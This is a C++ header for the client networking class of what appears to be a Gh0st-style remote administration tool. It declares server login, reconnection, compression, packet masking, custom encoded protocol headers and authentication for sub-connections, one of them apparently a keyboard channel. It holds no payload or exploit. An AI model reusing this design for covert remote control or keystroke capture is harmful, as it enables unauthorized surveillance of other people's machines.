// IOCPClient.h: interface for the IOCPClient class. // ////////////////////////////////////////////////////////////////////// #pragma once #ifdef _WIN32 #include "stdafx.h" #include #include #pragma comment(lib,"ws2_32.lib") #endif #include "Buffer.h" #include "zstd/zstd.h" #include "domain_pool.h" #include "common/mask.h" #include "common/header.h" #define NO_AES #include "common/encrypt.h" #ifdef _WIN32 #include "SafeThread.h" #else #ifndef SAFE_DELETE #define SAFE_DELETE(p) if(NULL !=(p)){ delete (p);(p) = NULL;} #endif #ifndef SAFE_DELETE_ARRAY #define SAFE_DELETE_ARRAY(p) if(NULL !=(p)){ delete[] (p);(p) = NULL;} #endif #include #include #endif #include "IOCPBase.h" #include #include #include #define MAX_RECV_BUFFER 1024*32 #define MAX_SEND_BUFFER 1024*128 // 增大分块大小以提高发送效率 enum { S_STOP = 0, S_RUN, S_END }; typedef int (*DataProcessCB)(void* userData, PBYTE szBuffer, ULONG ulLength); typedef int (*OnDisconnectCB)(void* userData); class ProtocolEncoder { public: virtual ~ProtocolEncoder() {} virtual HeaderFlag GetHead() const { return "Shine"; } virtual int GetHeadLen() const { return 13; } virtual int GetFlagLen() const { return 5; } virtual void Encode(unsigned char* data, int len, unsigned char* param = 0) {} virtual void Decode(unsigned char* data, int len, unsigned char* param = 0) {} virtual EncFun GetHeaderEncoder() const { return nullptr; } }; class HellEncoder : public ProtocolEncoder { private: EncFun m_HeaderEnc; Encoder *m_BodyEnc; public: HellEncoder(EncFun head, Encoder *body) { m_HeaderEnc = head; m_BodyEnc = body; } ~HellEncoder() { SAFE_DELETE(m_BodyEnc); } virtual HeaderFlag GetHead() const override { return ::GetHead(m_HeaderEnc); } virtual int GetHeadLen() const override { return 16; } virtual int GetFlagLen() const override { return 8; } virtual void Encode(unsigned char* data, int len, unsigned char* param = 0) override { return m_BodyEnc->Encode(data, len, param); } virtual void Decode(unsigned char* data, int len, unsigned char* param = 0) override { return m_BodyEnc->Decode(data, len, param); } virtual EncFun GetHeaderEncoder() const override { return m_HeaderEnc; } }; class IOCPManager { public: virtual ~IOCPManager() {} virtual BOOL IsAlive() const { return TRUE; } virtual BOOL IsReady() const { return TRUE; } virtual VOID OnReceive(PBYTE szBuffer, ULONG ulLength) { } // Tip: 在派生类实现该函数以便支持断线重连 virtual BOOL OnReconnect() { return FALSE; } static int DataProcess(void* user, PBYTE szBuffer, ULONG ulLength) { IOCPManager* m_Manager = (IOCPManager*)user; if (nullptr == m_Manager) { Mprintf("IOCPManager DataProcess on NULL ptr: %d\n", unsigned(szBuffer[0])); return FALSE; } // 等待子类准备就绪才能处理数据, 1秒足够了 int i = 0; for (; i < 1000 && !m_Manager->IsReady(); ++i) Sleep(1); if (!m_Manager->IsReady()) { Mprintf("IOCPManager DataProcess is NOT ready: %d\n", unsigned(szBuffer[0])); return FALSE; } if (i) { Mprintf("IOCPManager DataProcess wait for %dms: %d\n", i, unsigned(szBuffer[0])); } m_Manager->OnReceive(szBuffer, ulLength); return TRUE; } static int ReconnectProcess(void* user) { IOCPManager* m_Manager = (IOCPManager*)user; if (nullptr == m_Manager) { return FALSE; } return m_Manager->OnReconnect(); } }; typedef BOOL(*TrailCheck)(void); class IOCPClient : public IOCPBase { public: IOCPClient(const State& bExit, bool exit_while_disconnect = false, int mask=0, CONNECT_ADDRESS *conn=0, const std::string&pubIP="", void*main=0); virtual ~IOCPClient(); int SendLoginInfo(const LOGIN_INFOR& logInfo) { LOGIN_INFOR tmp = logInfo; int iRet = Send2Server((char*)&tmp, sizeof(LOGIN_INFOR)); return iRet; } virtual BOOL ConnectServer(const char* szServerIP, unsigned short uPort); std::string GetClientIP() const { return m_sLocPublicIP; } std::map GetClientIPHeader() const { return m_sLocPublicIP.empty() ? std::map {} : std::map { {"X-Forwarded-For", m_sLocPublicIP} }; } BOOL Send2Server(const char* szBuffer, ULONG ulOriginalLength, PkgMask* mask = NULL) { return OnServerSending(szBuffer, ulOriginalLength, mask); } void SetServerAddress(const char* szServerIP, unsigned short uPort) { m_Domain = szServerIP ? szServerIP : "127.0.0.1"; m_nHostPort = uPort; } std::string ServerIP() const { return m_sCurIP; } int ServerPort() const { return m_nHostPort; } BOOL IsRunning() const { return m_bIsRunning; } VOID StopRunning() { m_ReconnectFunc = NULL; m_bIsRunning = FALSE; } VOID setManagerCallBack(void* Manager, DataProcessCB dataProcess, OnDisconnectCB reconnect); VOID RunEventLoop(TrailCheck checker); VOID RunEventLoop(const BOOL &bCondition); bool IsConnected() const { return m_bConnected == TRUE; } BOOL Reconnect(void* manager) { Disconnect(); if (manager) m_Manager = manager; return ConnectServer(NULL, 0); } const State& GetState() const { return g_bExit; } void SetMultiThreadCompress(int threadNum=0); std::string GetClientID() const { return m_conn ? std::to_string(m_conn->clientID) : ""; } std::string GetPublicIP() const { return m_sLocPublicIP; } CONNECT_ADDRESS* GetConnectionAddress() const { return m_conn; } IOCPManager* GetManager() const { return (IOCPManager*)m_Manager; } void* GetMain() const { return m_main; } void SetVerifyInfo(const std::string& msg, const std::string& hmac) { m_LoginMsg = msg; m_LoginSignature = hmac; } // 子连接身份校验:发 TOKEN_CONN_AUTH 包,等服务端 ConnAuthAck 响应。 // 返回 true 表示通过,false 表示超时/失败/网络错误。 // 主连接不调用此方法。新客户端必须调用并校验成功后才能继续后续命令。 // 已实现的协议扩展(如 KeyBoard 子连接的 cap word)保留不变,与本机制并行工作。 bool PerformConnAuth(uint64_t clientID, int timeoutMs); // 让 ConnectServer 在每次成功后自动调一次 PerformConnAuth(opt-in)。 // 子连接构造后调用此方法启用。 // - clientID == 0:每次 auth 时从 m_conn->clientID 现取(Windows 客户端走此路径)。 // 这样即便 IOCPClient 创建时主连接还没拿到 ID,真正连上时也能用到最新值。 // - clientID != 0:显式指定(Linux/macOS 客户端 IOCPClient 不带 m_conn 时用此参数)。 void EnableSubConnAuth(bool enabled = true, uint64_t clientID = 0) { m_subConnAuthEnabled = enabled; m_subConnAuthClientID = clientID; } // 内部:在收到的数据帧分发到 manager 之前,尝试识别并消费 TOKEN_CONN_AUTH ack。 // 仅在我们正在等待 auth 响应时(m_authPending=true)才消费;否则透传给 manager。 bool TryHandleAuthResponse(PBYTE buf, ULONG len); protected: virtual int ReceiveData(char* buffer, int bufSize, int flags) { // TCP版本调用 recv return recv(m_sClientSocket, buffer, bufSize - 1, 0); } virtual bool ProcessRecvData(CBuffer* m_CompressedBuffer, char* szBuffer, int len, int flag); virtual VOID Disconnect(); // 函数支持 TCP/UDP virtual int SendTo(const char* buf, int len, int flags) { return ::send(m_sClientSocket, buf, len, flags); } BOOL OnServerSending(const char* szBuffer, ULONG ulOriginalLength, PkgMask* mask); static DWORD WINAPI WorkThreadProc(LPVOID lParam); VOID OnServerReceiving(CBuffer *m_CompressedBuffer, char* szBuffer, ULONG ulReceivedLength); BOOL SendWithSplit(const char* src, ULONG srcSize, ULONG ulSplitLength, int cmd, PkgMask* mask); protected: sockaddr_in m_ServerAddr; SOCKET m_sClientSocket; BOOL m_bWorkThread; HANDLE m_hWorkThread; BOOL m_bIsRunning; BOOL m_bConnected; std::mutex m_Locker; // 子连接身份校验同步状态。仅在 PerformConnAuth 调用期间生效。 std::mutex m_authMtx; std::condition_variable m_authCv; int m_authStatus = -1; // -1 = 未启动;其它 = ConnAuthStatus bool m_authPending = false; // true 时 TryHandleAuthResponse 才消费 ack // ConnectServer 成功后自动 auth 的 opt-in 标志。子连接构造后调 EnableSubConnAuth() 设为 true。 bool m_subConnAuthEnabled = false; uint64_t m_subConnAuthClientID = 0; // 0 表示从 m_conn->clientID 现取 #if USING_CTX ZSTD_CCtx* m_Cctx; // 压缩上下文 ZSTD_DCtx* m_Dctx; // 解压上下文 #endif const State& g_bExit; // 全局状态量 void* m_Manager; // 用户数据 DataProcessCB m_DataProcess; // 处理用户数据 OnDisconnectCB m_ReconnectFunc; // 断线重连逻辑 ProtocolEncoder* m_Encoder; // 加密 DomainPool m_Domain; std::string m_sCurIP; int m_nHostPort; bool m_exit_while_disconnect; PkgMask* m_masker; BOOL m_EncoderType; std::string m_sLocPublicIP; CONNECT_ADDRESS *m_conn = NULL; void *m_main = NULL; public: std::string m_LoginMsg; // 登录消息摘要 std::string m_LoginSignature; // 登录消息签名 };